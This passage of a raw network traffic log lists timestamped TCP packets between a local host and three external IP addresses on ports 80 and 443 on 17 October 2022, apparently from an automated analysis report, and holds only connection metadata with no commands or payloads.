                                                                                                                                  Oct 17, 2022 22:07:11.383829117 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.383860111 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.383889914 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.383919001 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.383950949 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.383980036 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.383980989 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.384008884 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.384103060 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.388024092 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388062000 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388092995 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388122082 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388154030 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388181925 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388211012 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388240099 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388268948 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388297081 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388325930 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388358116 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388389111 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388433933 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388467073 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388497114 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388526917 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388550997 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388581038 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388611078 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.388641119 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.393959999 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.394171000 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.394638062 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.424865007 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.424896955 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.424921036 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.424943924 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.424969912 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.435566902 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.502624989 CEST804970645.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.545358896 CEST804970645.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.557333946 CEST4970680192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:11.557406902 CEST4970680192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:11.564759016 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.564841986 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.592379093 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.681624889 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.690139055 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.690223932 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.699702024 CEST804970645.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.699755907 CEST804970645.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.717715979 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.717757940 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.731040955 CEST804970645.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.804989100 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.812720060 CEST4970680192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:11.912653923 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.963156939 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.963213921 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:11.990848064 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:11.990921021 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.079642057 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.196327925 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:12.196382999 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:12.223890066 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.223942041 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.312789917 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.366313934 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:12.366372108 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:12.393837929 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.394015074 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.481183052 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.520477057 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.520524979 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.520621061 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.521017075 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.521032095 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.574820042 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.578490973 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.588452101 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.588480949 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.588905096 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.594950914 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.594979048 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.612961054 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:12.786159992 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.786350012 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.786447048 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.786536932 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.786621094 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.786715031 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.792435884 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.792465925 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.803683996 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.803771019 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.803855896 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.803958893 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804095030 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804161072 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804244041 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804284096 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.804316998 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804390907 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804469109 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804617882 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804636002 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.804653883 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804740906 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804754019 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.804769993 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804874897 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.804948092 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.805071115 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.805085897 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.805161953 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.820444107 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.820620060 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.820708036 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.820786953 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.820871115 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.820945978 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.821022034 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.821119070 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.821198940 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.821278095 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.821371078 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.822413921 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.824734926 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.824770927 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.824925900 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.824938059 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.826638937 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.826704025 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.838274956 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.838464975 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.838598967 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.839397907 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.839509010 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.839529037 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.839746952 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.840626001 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.840678930 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.840692997 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.840754032 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.840795994 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.840933084 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.840976954 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.840989113 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841053009 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841140985 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.841151953 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841236115 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841280937 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.841290951 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841355085 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841399908 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.841408968 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841478109 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841520071 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.841530085 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841602087 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841643095 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.841656923 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841730118 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841790915 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.841799974 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841864109 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.841902018 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.841912031 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842003107 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842055082 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.842065096 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842152119 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842199087 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.842214108 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842287064 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842338085 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842411041 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842411041 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.842442036 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842467070 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.842565060 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842611074 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.842619896 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842685938 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842753887 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.842756033 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842794895 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.842844963 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.842911005 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843036890 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843084097 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.843097925 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843168974 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843245029 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843269110 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.843286991 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843326092 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.843336105 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843420029 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843473911 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843548059 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843625069 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.843627930 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843663931 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843705893 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.843733072 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843852043 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843900919 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.843913078 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.843996048 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844042063 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.844052076 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844134092 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844176054 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.844185114 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844264030 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844309092 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.844317913 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844383955 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844468117 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844540119 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.844542980 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844552040 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844589949 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.844613075 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844657898 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.844696045 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844842911 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844885111 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.844896078 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.844971895 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.845014095 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.845024109 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856333971 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856436014 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856493950 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856555939 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856615067 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856673002 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856731892 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856787920 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856844902 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856904030 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.856964111 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857023954 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857080936 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857137918 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857194901 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857251883 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857309103 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857383966 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857439041 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857491016 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857552052 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857610941 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857671022 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857731104 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857840061 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857897043 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.857960939 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.858015060 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.858189106 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.870959997 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.871747017 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.887646914 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.899585009 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.899719954 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.906018972 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.915994883 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.916505098 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.916541100 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.916557074 CEST49707443192.168.2.5140.82.121.3
                                                                                                                                  Oct 17, 2022 22:07:12.916568041 CEST44349707140.82.121.3192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.930023909 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:12.930119991 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:12.957593918 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:12.957622051 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:13.046180964 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:13.223623037 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:13.918077946 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:13.918152094 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:13.945656061 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:13.945698977 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:14.032011032 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:14.122504950 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:14.182276964 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:14.182348967 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:14.210042953 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:14.210072994 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:14.298707008 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:14.426518917 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:15.882101059 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:15.882164955 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:15.910042048 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:15.910101891 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:15.996644020 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:16.018100977 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:16.018167973 CEST4970580192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:16.045835972 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:16.045907021 CEST804970534.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:16.133193970 CEST804970534.91.216.49192.168.2.5
